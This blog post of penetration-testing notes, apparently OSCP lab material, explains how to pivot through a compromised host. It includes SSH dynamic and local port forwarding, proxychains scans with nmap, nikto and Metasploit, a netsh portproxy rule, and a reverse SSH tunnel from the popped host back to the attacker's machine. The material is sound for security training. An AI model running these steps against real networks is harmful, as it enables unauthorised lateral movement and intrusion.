Pivoting Notes

Pivoting

If you can SSH to the compromised server by using ssh, you can use the SSH Dynamic Port Forwarding (Socks Proxy) or
SSH Local Port Forwarding Technique to scan the host. Before we start, you need to know the lab configuration first:

Attacker Machine/Your Machine – (10.11.0.X) – Kali O/S
Compromised_Host/Pivot_Host (The host you are going to use as a proxy machine) – 10.11.1.X (Public interface)/ 10.1.1.X (IT Network interface) – Windows O/S
Target Machine – (10.1.1.X)

=== SSH Dynamic Port Forwarding (Socks proxy) ===

In Attacker’s Machine (Kali)

root@kali:#ssh -D address: port -f -N username@pivot_host
root@kali:#ssh -D 127.0.0.1:8080 -f -N administrator@10.11.1.X
administrator@10.11.1.X’s password:

(KEEP THIS TERMINAL OPEN)

>>> Scanning the ports with nmap <<< root@kali:#proxychains nmap -PN sV -sT --unprivileged 10.1.1.X >>> Scanning web vulnerabilities using nikto <<< root@kali:#proxychains nikto -host 10.1.1.X >>> Using MSF <<< root@kali:#proxychains msfconsole === SSH Local Port Forwarding === root@kali:#ssh -L attackerPort:targetMachineIP:targetMachinePort username@pivot_host root@kali:#ssh -L 80:10.1.1.X:80 administrator@10.11.1.X (KEEP THIS TERMINAL OPEN) >>> Scanning port 80 with nmap <<< root@kali:#nmap -Pn -sV -sT -p 80 localhost >>> Scanning web vulnerabilities using nikto <<< root@kali:#nikto -h 10.1.1.X -useproxy http://127.0.0.1:80/ (OR) root@kali:#nikto -h 127.0.0.1 >>> Scanning port 80 with MSF <<< msf > use auxiliary/scanner/http/http_version
msf auxiliary(http_version) > set RHOSTS 127.0.0.1
msf auxiliary(http_version) > set RPORT 80
msf auxiliary(http_version) > run

=== SSH Native Windows Port Forwarding (Must be Administrator) ===

(Inside the Compromised_Host/Pivot_Host)

C:\Users\Administrator>netsh interface portproxy add v4tov4 listenport= listenaddress=pivot_host_ITNEtworkInterfaceIP connectport=targetMachine’sPort connectaddress=targetMachine’sIP
C:\Users\Administrator>netsh interface portproxy add v4tov4 listenport=8888 listenaddress=10.1.1.X connectport=80 connectaddress=10.1.1.X

>>> Scanning web vulnerabilities using nikto <<< root@kali:#nikto -h pivot_Host:8888 root@kali:#nikto -h 10.11.1.X:8888 ## Pivoting alternative? sshuttle -r user@10.11.1.252 10.X.X.0/24 Proxychains ## On popped host $ ssh -f -N -R 2222:127.0.0.1:22 root@10.11.0.201 ## On Kali $ ssh -f -N -D 127.0.0.1:8080 -p 2222 firefart@127.0.0.1 $ proxychains nmap --top-ports=20 -sT -Pn 10.1.1.0/24 Reference: https://ibarramario94.gitbooks.io/oscp/content/oscp/pivoting.html

Author: McPeters Joseph

Joseph McPeters is a Security Researcher. He specializes in network and web application penetration testing. Contact: admin@incidentsecurity.com

Leave a Reply

Your email address will not be published. Required fields are marked *